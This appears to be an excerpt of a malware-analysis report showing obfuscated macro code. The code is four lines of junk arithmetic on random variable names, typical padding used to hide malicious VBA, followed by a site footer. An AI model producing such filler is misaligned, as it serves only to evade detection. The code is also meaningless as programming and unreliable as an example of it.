NjwZUj = 56780 + siQMdU + 64448 / DPiirK + 16216 * BoCfaj * rwcWG / wmvio - SkYNLL - IjWFkD + 52564 * YfhwA
GtnVB = 86074 + TRuzRr + 25600 / rriFmr + 65019 * qKSUz * bIiHI / TCCWET - YhqBUm - fviHwO + 47435 * zKjYk
IZOBz = 52648 + HcizC + 35010 / FcaqTr + 51911 * VsrTiD * GOkoi / LKMOk - BGnFi - lAvEqi + 15744 * VDVKdw
pmVJi = 66147 + poMAS + 4169 / nzJwh + 9284 * jaWJu * uFsmf / YivVsl - kpGWH - MPkzBl + 83100 * tIMzAn
End Function
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.